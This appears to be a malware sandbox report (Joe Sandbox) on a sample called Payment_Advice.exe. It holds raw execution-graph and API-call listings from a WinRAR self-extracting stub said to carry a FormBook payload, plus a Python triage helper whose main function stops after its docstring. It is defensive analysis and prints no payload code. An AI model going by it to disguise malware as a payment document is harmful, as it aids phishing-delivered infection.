23936 51b8e6 GetMessageW 23926->23936 24157 51abab GetClassNameW 23928->24157 23929->23928 23937 51b9d1 23931->23937 23932 51be55 23934 50e617 53 API calls 23932->23934 23933 51b862 23933->23899 23940 51c1fc SetDlgItemTextW 23933->23940 23939 51be65 SetDlgItemTextW 23934->23939 23936->23899 23942 51b8fd IsDialogMessageW 23936->23942 24177 51d4d4 23937->24177 23947 50e617 53 API calls 23938->23947 23944 51be79 23939->23944 23940->23899 23942->23926 23946 51b90c TranslateMessage DispatchMessageW 23942->23946 23949 50e617 53 API calls 23944->23949 23946->23926 23948 51ba17 23947->23948 23951 504092 _swprintf 51 API calls 23948->23951 23980 51be9c _wcslen 23949->23980 23950 51bff0 23953 51c020 23950->23953 23957 50e617 53 API calls 23950->23957 23956 51ba29 23951->23956 23952 51c73f 98 API calls 23952->23950 23959 51c73f 98 API calls 23953->23959 24000 51c0d8 23953->24000 23954 51b9d9 24075 50a0b1 23954->24075 23961 51d4d4 16 API calls 23956->23961 23962 51c003 SetDlgItemTextW 23957->23962 23965 51c03b 23959->23965 23960 51c18b 23967 51c194 EnableWindow 23960->23967 23968 51c19d 23960->23968 23961->23954 23970 50e617 53 API calls 23962->23970 23963 51ba68 GetLastError 23964 51ba73 23963->23964 24081 51ac04 SetCurrentDirectoryW 23964->24081 23975 51c04d 23965->23975 24005 51c072 23965->24005 23967->23968 23973 51c1ba 23968->23973 24195 5012d3 GetDlgItem KiUserCallbackDispatcher 23968->24195 23969 51beed 23971 50e617 53 API calls 23969->23971 23974 51c017 SetDlgItemTextW 23970->23974 23971->23899 23972 51ba87 23976 51ba9e 23972->23976 23977 51ba90 GetLastError 23972->23977 23981 51c1e1 23973->23981 23990 51c1d9 SendMessageW 23973->23990 23974->23953 24193 519ed5 32 API calls 23975->24193 23984 51bb11 23976->23984 23986 51bb20 23976->23986 23992 51baae GetTickCount 23976->23992 23977->23976 23978 51c0cb 23982 51c73f 98 API calls 23978->23982 23980->23969 23993 50e617 53 API calls 23980->23993 23981->23899 23991 50e617 53 API calls 23981->23991 23982->24000 23984->23986 
23987 51bd56 23984->23987 23985 51c1b0 24196 5012d3 GetDlgItem KiUserCallbackDispatcher 23985->24196 23995 51bcfb 23986->23995 23996 51bcf1 23986->23996 23997 51bb39 GetModuleFileNameW 23986->23997 24097 5012f1 GetDlgItem ShowWindow 23987->24097 23988 51c066 23988->24005 23990->23981 23991->23933 23999 504092 _swprintf 51 API calls 23992->23999 24001 51bed0 23993->24001 23994 51c169 24194 519ed5 32 API calls 23994->24194 24004 50e617 53 API calls 23995->24004 23996->23907 23996->23995 24187 50f28c 82 API calls 23997->24187 24007 51bac7 23999->24007 24000->23960 24000->23994 24009 50e617 53 API calls 24000->24009 24008 504092 _swprintf 51 API calls 24001->24008 24012 51bd05 24004->24012 24005->23978 24013 51c73f 98 API calls 24005->24013 24006 51bd66 24098 5012f1 GetDlgItem ShowWindow 24006->24098 24082 50966e 24007->24082 24008->23969 24009->24000 24010 51c188 24010->23960 24011 51bb5f 24015 504092 _swprintf 51 API calls 24011->24015 24016 504092 _swprintf 51 API calls 24012->24016 24017 51c0a0 24013->24017 24019 51bb81 CreateFileMappingW 24015->24019 24020 51bd23 24016->24020 24017->23978 24021 51c0a9 DialogBoxParamW 24017->24021 24018 51bd70 24022 50e617 53 API calls 24018->24022 24024 51bbe3 GetCommandLineW 24019->24024 24059 51bc60 __InternalCxxFrameHandler 24019->24059 24033 50e617 53 API calls 24020->24033 24021->23907 24021->23978 24025 51bd7a SetDlgItemTextW 24022->24025 24027 51bbf4 24024->24027 24099 5012f1 GetDlgItem ShowWindow 24025->24099 24026 51baed 24030 51baff 24026->24030 24031 51baf4 GetLastError 24026->24031 24188 51b425 SHGetMalloc 24027->24188 24029 51bc6b ShellExecuteExW 24044 51bc88 24029->24044 24090 50959a 24030->24090 24031->24030 24036 51bd3d 24033->24036 24035 51bd8c SetDlgItemTextW GetDlgItem 24038 51bdc1 24035->24038 24039 51bda9 GetWindowLongW SetWindowLongW 24035->24039 24037 51bc10 24189 51b425 SHGetMalloc 24037->24189 24100 51c73f 24038->24100 24039->24038 24042 51bc1c 24190 51b425 SHGetMalloc 24042->24190 24046 51bccb 
24044->24046 24047 51bc9d WaitForInputIdle 24044->24047 24045 51c73f 98 API calls 24049 51bddd 24045->24049 24046->23996 24054 51bce1 UnmapViewOfFile CloseHandle 24046->24054 24050 51bcb2 24047->24050 24126 51da52 24049->24126 24050->24046 24053 51bcb7 Sleep 24050->24053 24051 51bc28 24191 50f3fa 82 API calls 2 library calls 24051->24191 24053->24046 24053->24050 24054->23996 24057 51bc3f MapViewOfFile 24057->24059 24058 51c73f 98 API calls 24062 51be03 24058->24062 24059->24029 24060 51be2c 24192 5012d3 GetDlgItem KiUserCallbackDispatcher 24060->24192 24062->24060 24064 51c73f 98 API calls 24062->24064 24063->23907 24063->23932 24064->24060 24066 501378 24065->24066 24068 50131f 24065->24068 24198 50e2c1 GetWindowLongW SetWindowLongW 24066->24198 24067 501385 24067->23899 24067->23900 24067->23901 24068->24067 24197 50e2e8 62 API calls 2 library calls 24068->24197 24071 501341 24071->24067 24072 501354 GetDlgItem 24071->24072 24072->24067 24073 501364 24072->24073 24073->24067 24074 50136a SetWindowTextW 24073->24074 24074->24067 24076 50a0bb 24075->24076 24077 50a14c 24076->24077 24080 50a175 24076->24080 24199 50a2b2 24076->24199 24078 50a2b2 8 API calls 24077->24078 24077->24080 24078->24080 24080->23963 24080->23964 24081->23972 24083 509678 24082->24083 24084 5096d5 CreateFileW 24083->24084 24085 5096c9 24083->24085 24084->24085 24086 50971f 24085->24086 24087 50bb03 GetCurrentDirectoryW 24085->24087 24086->24026 24088 509704 24087->24088 24088->24086 24089 509708 CreateFileW 24088->24089 24089->24086 24091 5095cf 24090->24091 24092 5095be 24090->24092 24091->23984 24092->24091 24093 5095d1 24092->24093 24094 5095ca 24092->24094 24225 509620 24093->24225 24220 50974e 24094->24220 24097->24006 24098->24018 24099->24035 24101 51c749 __EH_prolog 24100->24101 24102 51bdcf 24101->24102 24240 51b314 ExpandEnvironmentStringsW 24101->24240 24102->24045 24106 51ca67 SetWindowTextW 24112 51c780 _wcslen _wcsrchr 24106->24112 24109 523e3e 22 API calls 24109->24112 24111 
51c855 SetFileAttributesW 24114 51c90f GetFileAttributesW 24111->24114 24124 51c86f _abort _wcslen 24111->24124 24112->24102 24112->24106 24112->24109 24112->24111 24112->24124 24241 511fbb CompareStringW 24112->24241 24242 51a64d GetCurrentDirectoryW 24112->24242 24244 50a5d1 6 API calls 24112->24244 24245 50a55a FindClose 24112->24245 24246 51b48e 76 API calls 2 library calls 24112->24246 24247 51b314 ExpandEnvironmentStringsW 24112->24247 24114->24112 24116 51c921 DeleteFileW 24114->24116 24116->24112 24118 51c932 24116->24118 24117 51cc31 GetDlgItem SetWindowTextW SendMessageW 24117->24124 24119 504092 _swprintf 51 API calls 24118->24119 24120 51c952 GetFileAttributesW 24119->24120 24120->24118 24122 51c967 MoveFileW 24120->24122 24121 51cc71 SendMessageW 24121->24112 24122->24112 24123 51c97f MoveFileExW 24122->24123 24123->24112 24124->24112 24124->24117 24124->24121 24125 51c8eb SHFileOperationW 24124->24125 24243 50b991 51 API calls 3 library calls 24124->24243 24125->24114 24127 51da5c __EH_prolog 24126->24127 24248 510659 24127->24248 24129 51da8d 24252 505b3d 24129->24252 24131 51daab 24256 507b0d 24131->24256 24135 51dafe 24272 507b9e 24135->24272 24137 51bdee 24137->24058 24139 51d6a8 24138->24139 24771 51a5c6 24139->24771 24142 51d6b5 GetWindow 24143 51bf15 24142->24143 24146 51d6d5 24142->24146 24143->23909 24143->23910 24144 51d6e2 GetClassNameW 24776 511fbb CompareStringW 24144->24776 24146->24143 24146->24144 24147 51d706 GetWindowLongW 24146->24147 24148 51d76a GetWindow 24146->24148 24147->24148 24149 51d716 SendMessageW 24147->24149 24148->24143 24148->24146 24149->24148 24150 51d72c GetObjectW 24149->24150 24777 51a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24150->24777 24152 51d743 24778 51a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24152->24778 24779 51a80c 8 API calls 24152->24779 24155 51d754 SendMessageW DeleteObject 24155->24148 24156->23924 24158 51abf1 24157->24158 24159 51abcc 24157->24159 24163 51b093 24158->24163 24782 
511fbb CompareStringW 24159->24782 24161 51abdf 24161->24158 24162 51abe3 FindWindowExW 24161->24162 24162->24158 24164 51b09d __EH_prolog 24163->24164 24165 5013dc 84 API calls 24164->24165 24166 51b0bf 24165->24166 24783 501fdc 24166->24783 24169 51b0d9 24172 501692 86 API calls 24169->24172 24170 51b0eb 24171 5019af 129 API calls 24170->24171 24175 51b10d __InternalCxxFrameHandler ___std_exception_copy 24171->24175 24173 51b0e4 24172->24173 24173->23950 24173->23952 24174 501692 86 API calls 24174->24173 24175->24174 24176->23933 24178 51b568 5 API calls 24177->24178 24179 51d4e0 GetDlgItem 24178->24179 24180 51d502 24179->24180 24181 51d536 SendMessageW SendMessageW 24179->24181 24186 51d50d ShowWindow SendMessageW SendMessageW 24180->24186 24182 51d591 SendMessageW SendMessageW SendMessageW 24181->24182 24183 51d572 24181->24183 24184 51d5c4 SendMessageW 24182->24184 24185 51d5e7 SendMessageW 24182->24185 24183->24182 24184->24185 24185->23954 24186->24181 24187->24011 24188->24037 24189->24042 24190->24051 24191->24057 24192->24063 24193->23988 24194->24010 24195->23985 24196->23973 24197->24071 24198->24067 24200 50a2bf 24199->24200 24201 50a2e3 24200->24201 24202 50a2d6 CreateDirectoryW 24200->24202 24203 50a231 3 API calls 24201->24203 24202->24201 24207 50a316 24202->24207 24204 50a2e9 24203->24204 24205 50a329 GetLastError 24204->24205 24209 50bb03 GetCurrentDirectoryW 24204->24209 24206 50a325 24205->24206 24206->24076 24207->24206 24212 50a4ed 24207->24212 24210 50a2ff 24209->24210 24210->24205 24211 50a303 CreateDirectoryW 24210->24211 24211->24205 24211->24207 24213 51ec50 24212->24213 24214 50a4fa SetFileAttributesW 24213->24214 24215 50a510 24214->24215 24216 50a53d 24214->24216 24217 50bb03 GetCurrentDirectoryW 24215->24217 24216->24206 24218 50a524 24217->24218 24218->24216 24219 50a528 SetFileAttributesW 24218->24219 24219->24216 24221 509781 24220->24221 24222 509757 24220->24222 24221->24091 24222->24221 24231 50a1e0 24222->24231 24226 50962c 
24225->24226 24227 50964a 24225->24227 24226->24227 24229 509638 FindCloseChangeNotification 24226->24229 24228 509669 24227->24228 24239 506bd5 76 API calls 24227->24239 24228->24091 24229->24227 24232 51ec50 24231->24232 24233 50a1ed DeleteFileW 24232->24233 24234 50a200 24233->24234 24235 50977f 24233->24235 24236 50bb03 GetCurrentDirectoryW 24234->24236 24235->24091 24237 50a214 24236->24237 24237->24235 24238 50a218 DeleteFileW 24237->24238 24238->24235 24239->24228 24240->24112 24241->24112 24242->24112 24243->24124 24244->24112 24245->24112 24246->24112 24247->24112 24249 510666 _wcslen 24248->24249 24276 5017e9 24249->24276 24251 51067e 24251->24129 24253 510659 _wcslen 24252->24253 24254 5017e9 78 API calls 24253->24254 24255 51067e 24254->24255 24255->24131 24257 507b17 __EH_prolog 24256->24257 24293 50ce40 24257->24293 24259 507b32 24299 51eb38 24259->24299 24261 507b5c 24308 514a76 24261->24308 24264 507c7d 24265 507c87 24264->24265 24268 507cf1 24265->24268 24340 50a56d 24265->24340 24267 507d92 24267->24135 24269 507d50 24268->24269 24318 508284 24268->24318 24269->24267 24346 50138b 74 API calls 24269->24346 24273 507bac 24272->24273 24275 507bb3 24272->24275 24274 512297 86 API calls 24273->24274 24274->24275 24277 5017ff 24276->24277 24288 50185a __InternalCxxFrameHandler 24276->24288 24278 501828 24277->24278 24289 506c36 76 API calls __vswprintf_c_l 24277->24289 24280 501887 24278->24280 24285 501847 ___std_exception_copy 24278->24285 24282 523e3e 22 API calls 24280->24282 24281 50181e 24290 506ca7 75 API calls 24281->24290 24284 50188e 24282->24284 24284->24288 24292 506ca7 75 API calls 24284->24292 24285->24288 24291 506ca7 75 API calls 24285->24291 24288->24251 24289->24281 24290->24278 24291->24288 24292->24288 24294 50ce4a __EH_prolog 24293->24294 24295 51eb38 8 API calls 24294->24295 24296 50ce8d 24295->24296 24297 51eb38 8 API calls 24296->24297 24298 50ceb1 24297->24298 24298->24259 24300 51eb3d ___std_exception_copy 24299->24300 24301 
51eb57 24300->24301 24304 51eb59 24300->24304 24314 527a5e 7 API calls 2 library calls 24300->24314 24301->24261 24303 51f5c9 24316 52238d RaiseException 24303->24316 24304->24303 24315 52238d RaiseException 24304->24315 24307 51f5e6 24309 514a80 __EH_prolog 24308->24309 24310 51eb38 8 API calls 24309->24310 24311 514a9c 24310->24311 24312 507b8b 24311->24312 24317 510e46 80 API calls 24311->24317 24312->24264 24314->24300 24315->24303 24316->24307 24317->24312 24319 50828e __EH_prolog 24318->24319 24347 5013dc 24319->24347 24321 5082aa 24322 5082bb 24321->24322 24490 509f42 24321->24490 24325 5082f2 24322->24325 24355 501a04 24322->24355 24486 501692 24325->24486 24328 508389 24374 508430 24328->24374 24331 5083e8 24382 501f6d 24331->24382 24335 5082ee 24335->24325 24335->24328 24338 50a56d 7 API calls 24335->24338 24494 50c0c5 CompareStringW _wcslen 24335->24494 24336 5083f3 24336->24325 24386 503b2d 24336->24386 24398 50848e 24336->24398 24338->24335 24341 50a582 24340->24341 24345 50a5b0 24341->24345 24760 50a69b 24341->24760 24343 50a592 24344 50a597 FindClose 24343->24344 24343->24345 24344->24345 24345->24265 24346->24267 24348 5013e1 __EH_prolog 24347->24348 24349 50ce40 8 API calls 24348->24349 24350 501419 24349->24350 24351 51eb38 8 API calls 24350->24351 24354 501474 _abort 24350->24354 24352 501461 24351->24352 24353 50b505 84 API calls 24352->24353 24352->24354 24353->24354 24354->24321 24357 501a0e __EH_prolog 24355->24357 24356 501b9b 24356->24335 24357->24356 24369 501a61 24357->24369 24495 5013ba 24357->24495 24359 501bc7 24498 50138b 74 API calls 24359->24498 24362 503b2d 102 API calls 24365 501c12 24362->24365 24363 501bd4 24363->24356 24363->24362 24364 501c5a 24364->24356 24368 501c8d 24364->24368 24499 50138b 74 API calls 24364->24499 24365->24364 24367 503b2d 102 API calls 24365->24367 24367->24365 24368->24356 24372 509e80 79 API calls 24368->24372 24369->24356 24369->24359 24369->24363 24370 503b2d 102 API calls 24371 501cde 24370->24371 
24371->24356 24371->24370 24372->24371 24373 509e80 79 API calls 24373->24369 24517 50cf3d 24374->24517 24376 508440 24521 5113d2 GetSystemTime SystemTimeToFileTime 24376->24521 24378 5083a3 24378->24331 24379 511b66 24378->24379 24522 51de6b 24379->24522 24383 501f72 __EH_prolog 24382->24383 24385 501fa6 24383->24385 24530 5019af 24383->24530 24385->24336 24387 503b39 24386->24387 24388 503b3d 24386->24388 24387->24336 24397 509e80 79 API calls 24388->24397 24389 503b4f 24390 503b78 24389->24390 24391 503b6a 24389->24391 24684 50286b 102 API calls 3 library calls 24390->24684 24396 503baa 24391->24396 24683 5032f7 90 API calls 2 library calls 24391->24683 24394 503b76 24394->24396 24685 5020d7 74 API calls 24394->24685 24396->24336 24397->24389 24399 508498 __EH_prolog 24398->24399 24402 5084d5 24399->24402 24417 508513 24399->24417 24710 518c8d 104 API calls 24399->24710 24401 5084f5 24403 5084fa 24401->24403 24404 50851c 24401->24404 24402->24401 24406 50857a 24402->24406 24402->24417 24403->24417 24711 507a0d 153 API calls 24403->24711 24404->24417 24712 518c8d 104 API calls 24404->24712 24406->24417 24686 505d1a 24406->24686 24409 508605 24409->24417 24692 508167 24409->24692 24412 508797 24413 50a56d 7 API calls 24412->24413 24415 508802 24412->24415 24413->24415 24414 50d051 82 API calls 24423 50885d 24414->24423 24698 507c0d 24415->24698 24417->24336 24418 50898b 24715 502021 74 API calls 24418->24715 24419 508992 24420 508a5f 24419->24420 24425 5089e1 24419->24425 24424 508ab6 24420->24424 24437 508a6a 24420->24437 24423->24414 24423->24417 24423->24418 24423->24419 24713 508117 85 API calls 24423->24713 24714 502021 74 API calls 24423->24714 24432 508a4c 24424->24432 24718 507fc0 97 API calls 24424->24718 24429 50a231 3 API calls 24425->24429 24425->24432 24434 508b14 24425->24434 24426 509105 24431 50959a 80 API calls 24426->24431 24427 508ab4 24428 50959a 80 API calls 24427->24428 24428->24417 24433 508a19 24429->24433 24431->24417 24432->24427 
24432->24434 24433->24432 24716 5092a3 97 API calls 24433->24716 24434->24426 24446 508b82 24434->24446 24719 5098bc 24434->24719 24435 50ab1a 8 API calls 24438 508bd1 24435->24438 24437->24427 24717 507db2 101 API calls 24437->24717 24441 50ab1a 8 API calls 24438->24441 24458 508be7 24441->24458 24444 508b70 24723 506e98 77 API calls 24444->24723 24446->24435 24447 508cbc 24448 508e40 24447->24448 24449 508d18 24447->24449 24452 508e52 24448->24452 24453 508e66 24448->24453 24472 508d49 24448->24472 24450 508d8a 24449->24450 24451 508d28 24449->24451 24460 508167 19 API calls 24450->24460 24455 508d6e 24451->24455 24463 508d37 24451->24463 24456 509215 124 API calls 24452->24456 24454 513377 75 API calls 24453->24454 24457 508e7f 24454->24457 24455->24472 24726 5077b8 111 API calls 24455->24726 24456->24472 24461 513020 124 API calls 24457->24461 24458->24447 24459 508c93 24458->24459 24466 50981a 79 API calls 24458->24466 24459->24447 24724 509a3c 82 API calls 24459->24724 24464 508dbd 24460->24464 24461->24472 24725 502021 74 API calls 24463->24725 24468 508df5 24464->24468 24469 508de6 24464->24469 24464->24472 24466->24459 24728 509155 93 API calls __EH_prolog 24468->24728 24727 507542 85 API calls 24469->24727 24475 508f85 24472->24475 24729 502021 74 API calls 24472->24729 24474 509090 24474->24426 24476 50a4ed 3 API calls 24474->24476 24475->24426 24475->24474 24477 50903e 24475->24477 24704 509f09 SetEndOfFile 24475->24704 24478 5090eb 24476->24478 24705 509da2 24477->24705 24478->24426 24730 502021 74 API calls 24478->24730 24481 509085 24483 509620 77 API calls 24481->24483 24483->24474 24484 5090fb 24731 506dcb 76 API calls _wcschr 24484->24731 24487 5016a4 24486->24487 24747 50cee1 24487->24747 24492 509f59 24490->24492 24491 509f63 24491->24322 24492->24491 24759 506d0c 78 API calls 24492->24759 24494->24335 24500 501732 24495->24500 24497 5013d6 24497->24373 24498->24356 24499->24368 24501 501748 24500->24501 24512 5017a0 __InternalCxxFrameHandler 
24500->24512 24502 501771 24501->24502 24513 506c36 76 API calls __vswprintf_c_l 24501->24513 24504 5017c7 24502->24504 24509 50178d ___std_exception_copy 24502->24509 24506 523e3e 22 API calls 24504->24506 24505 501767 24514 506ca7 75 API calls 24505->24514 24508 5017ce 24506->24508 24508->24512 24516 506ca7 75 API calls 24508->24516 24509->24512 24515 506ca7 75 API calls 24509->24515 24512->24497 24513->24505 24514->24502 24515->24512 24516->24512 24518 50cf4d 24517->24518 24520 50cf54 24517->24520 24519 50981a 79 API calls 24518->24519 24519->24520 24520->24376 24521->24378 24523 51de78 24522->24523 24524 50e617 53 API calls 24523->24524 24525 51de9b 24524->24525 24526 504092 _swprintf 51 API calls 24525->24526 24527 51dead 24526->24527 24528 51d4d4 16 API calls 24527->24528 24529 511b7c 24528->24529 24529->24331 24531 5019bf 24530->24531 24533 5019bb 24530->24533 24534 5018f6 24531->24534 24533->24385 24535 501908 24534->24535 24536 501945 24534->24536 24537 503b2d 102 API calls 24535->24537 24542 503fa3 24536->24542 24540 501928 24537->24540 24540->24533 24545 503fac 24542->24545 24543 503b2d 102 API calls 24543->24545 24544 501966 24544->24540 24547 501e50 24544->24547 24545->24543 24545->24544 24559 510e08 24545->24559 24548 501e5a __EH_prolog 24547->24548 24567 503bba 24548->24567 24550 501e84 24551 501732 78 API calls 24550->24551 24554 501f0b 24550->24554 24552 501e9b 24551->24552 24595 5018a9 78 API calls 24552->24595 24554->24540 24555 501eb3 24557 501ebf _wcslen 24555->24557 24596 511b84 MultiByteToWideChar 24555->24596 24597 5018a9 78 API calls 24557->24597 24560 510e0f 24559->24560 24561 510e2a 24560->24561 24565 506c31 RaiseException _com_raise_error 24560->24565 24563 510e3b SetThreadExecutionState 24561->24563 24566 506c31 RaiseException _com_raise_error 24561->24566 24563->24545 24565->24561 24566->24563 24568 503bc4 __EH_prolog 24567->24568 24569 503bf6 24568->24569 24570 503bda 24568->24570 24572 503e51 24569->24572 24575 503c22 24569->24575 
Execution graph (Joe Sandbox IDA plugin). The original is an interactive node/edge view; its text export is a flat run of internal node IDs and edges that carries no information beyond the API names attached to each node. Reduced here to the API chains recoverable from that data, all inside the stub image mapped at 00500000:
• Stub main path (51df1e): GetCommandLineW, OpenFileMappingW, MapViewOfFile / UnmapViewOfFile, CloseHandle, GetModuleFileNameW, SetEnvironmentVariableW (sfxcmd, sfxpar, sfxname, sfxstime), GetLocalTime, _swprintf, GetModuleHandleW, LoadIconW, LoadBitmapW, DialogBoxParamW, Sleep, DeleteObject, CloseHandle, then GdiplusShutdown and OleUninitialize (51ac7c); OleInitialize, GdiplusStartup and SHGetMalloc (51ac16) run before the dialog.
• DLL-loading setup (510863): GetModuleHandleW(kernel32), GetProcAddress(SetDllDirectoryW), GetProcAddress(SetDefaultDllDirectories), GetSystemDirectoryW, LoadLibraryW (51081b); GetModuleFileNameW, CreateFileW, SetFilePointer, ReadFile, CloseHandle on the stub's own image; GetVersionExW (50b146).
• Console message path (510cb7): AllocConsole, GetCurrentProcessId, AttachConsole, GetStdHandle, WriteConsoleW, Sleep, FreeConsole, ExitProcess.
• Extraction dialog and temp-file handling (51ce87, 51ae2f): GetTempPathW, SetDlgItemTextW, SetWindowTextW, SendMessageW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW / MoveFileExW, SHFileOperationW, FindFirstFileW / FindNextFileW / FindClose, GetCurrentDirectoryW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, CompareStringW, EndDialog.
• Output file creation (5098e0, 509db3): CreateFileW, GetLastError, GetCurrentDirectoryW, CreateFileW (retry), SetFileTime; FlushFileBuffers, SetFileTime; GetFileType, ReadFile on the input side (509785).
• Dialog logo (51b6dd, 51a6c2): LoadBitmapW, GetObjectW, GetDC / GetDeviceCaps / ReleaseDC, FindResourceW(PNG), SizeofResource, LoadResource, LockResource, GlobalAlloc / GlobalLock / GlobalUnlock / GlobalFree, GdipAlloc, GdipCreateBitmapFromStream / GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, DeleteObject.
• CRT startup and termination (51f3b2, 527cd5 and helpers): IsProcessorFeaturePresent, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, TlsAlloc, LoadLibraryExW / FreeLibrary, GetProcAddress, GetModuleHandleExW, GetPEB, GetCurrentProcess, TerminateProcess, ExitProcess. The node combining IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter and UnhandledExceptionFilter with _abort (51f838) is consistent with the MSVC CRT fail-fast/abort path rather than a separate anti-debugging check; the sandbox-evasion findings in this report are attributed elsewhere.
• Miscellaneous GUI nodes: GetClientRect (5194e0), GetCommandLineA / GetCommandLineW (52bee0), ShowWindow, GlobalAlloc, WideCharToMultiByte (519580), GetCPInfo / IsDBCSLeadByte (511bbd), MultiByteToWideChar (511b84), WideCharToMultiByte (511da7), CharUpperW (511fac), GetDlgItem / ShowWindow / SendMessageW (51b1b0), FreeLibrary (50f1e8).

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00510863: GetModuleHandleW.KERNEL32(kernel32), ref: 0051087C
                                                                                                      • Part of subcall function 00510863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0051088E
                                                                                                      • Part of subcall function 00510863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005108BF
                                                                                                      • Part of subcall function 0051A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0051A655
                                                                                                      • Part of subcall function 0051AC16: OleInitialize.OLE32(00000000), ref: 0051AC2F
                                                                                                      • Part of subcall function 0051AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0051AC66
                                                                                                      • Part of subcall function 0051AC16: SHGetMalloc.SHELL32(00548438), ref: 0051AC70
                                                                                                    • GetCommandLineW.KERNEL32 ref: 0051DF5C
                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0051DF83
                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0051DF94
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0051DFCE
                                                                                                      • Part of subcall function 0051DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0051DBF4
                                                                                                      • Part of subcall function 0051DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0051DC30
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0051DFD7
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,0055EC90,00000800), ref: 0051DFF2
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxname,0055EC90), ref: 0051DFFE
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0051E009
                                                                                                    • _swprintf.LIBCMT ref: 0051E048
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0051E05A
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0051E061
                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0051E078
                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0051E0C9
                                                                                                    • Sleep.KERNELBASE(?), ref: 0051E0F7
                                                                                                    • DeleteObject.GDI32 ref: 0051E130
                                                                                                    • DeleteObject.GDI32(?), ref: 0051E140
                                                                                                    • CloseHandle.KERNEL32 ref: 0051E183
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzU
                                                                                                    • API String ID: 3049964643-1481520227
                                                                                                    • Opcode ID: 0d3f46231f59000367be4a86103ac296756399d1fe774485a827c6086c791dbd
                                                                                                    • Instruction ID: 2ed8eea9a222feffbad7aea7950c3c5d64d65836c80d0a624b5b068194bdaa2e
                                                                                                    • Opcode Fuzzy Hash: 0d3f46231f59000367be4a86103ac296756399d1fe774485a827c6086c791dbd
                                                                                                    • Instruction Fuzzy Hash: C6610975504305BFE320AB64EC5EEAB3FECBBA5705F000429F94592291EB749D8CD761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
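The API and string set above (OpenFileMappingW on winrarsfxmappingfile.tmp, the STARTDLG dialog template, the sfxcmd / sfxpar / sfxname / sfxstime environment variables) is the fingerprint of a WinRAR self-extracting stub: the code at 00500000 is the unpacker, and the FormBook payload lives in the archive appended to it. The following triage helper is an added example, not code from the Joe Sandbox report or from WinRAR. It looks for those markers as UTF-16LE strings (the stub calls the W versions of the APIs), then locates the appended archive using the public RAR4 and RAR5 signatures, which are an assumption added here and not taken from the report. The stand-in stub bytes are constructed for the example, not extracted from Payment_Advice.exe.

```python
"""Triage helper: does a PE look like a WinRAR SFX stub, and where does the
appended RAR archive start?  Added example; not part of the sandbox report."""
from dataclasses import dataclass, field
from typing import Dict, Optional

# Wide-string markers the stub hands to OpenFileMappingW, DialogBoxParamW and
# SetEnvironmentVariableW (see the APIs and Strings listed in the report).
SFX_MARKERS = {
    "mapping": "winrarsfxmappingfile.tmp",
    "dialog": "STARTDLG",
    "env_sfxcmd": "sfxcmd",
    "env_sfxpar": "sfxpar",
    "env_sfxname": "sfxname",
    "env_sfxstime": "sfxstime",
}

# Public RAR archive signatures (assumption added here, not from the report):
# RAR 1.5-4.x: "Rar!\x1a\x07\x00"   RAR 5.x: "Rar!\x1a\x07\x01\x00"
RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"


@dataclass
class SfxTriage:
    is_pe: bool = False
    markers_found: Dict[str, int] = field(default_factory=dict)  # name -> offset
    rar_offset: Optional[int] = None
    rar_version: Optional[str] = None

    @property
    def is_winrar_sfx(self) -> bool:
        # Require a strong marker (mapping name or dialog template) plus at
        # least one sfx* variable, so a stray "sfxname" alone is not enough.
        strong = {"mapping", "dialog"} & set(self.markers_found)
        env = [k for k in self.markers_found if k.startswith("env_")]
        return self.is_pe and bool(strong) and bool(env)


def triage(data: bytes) -> SfxTriage:
    """Scan raw file bytes for the stub markers and the appended archive."""
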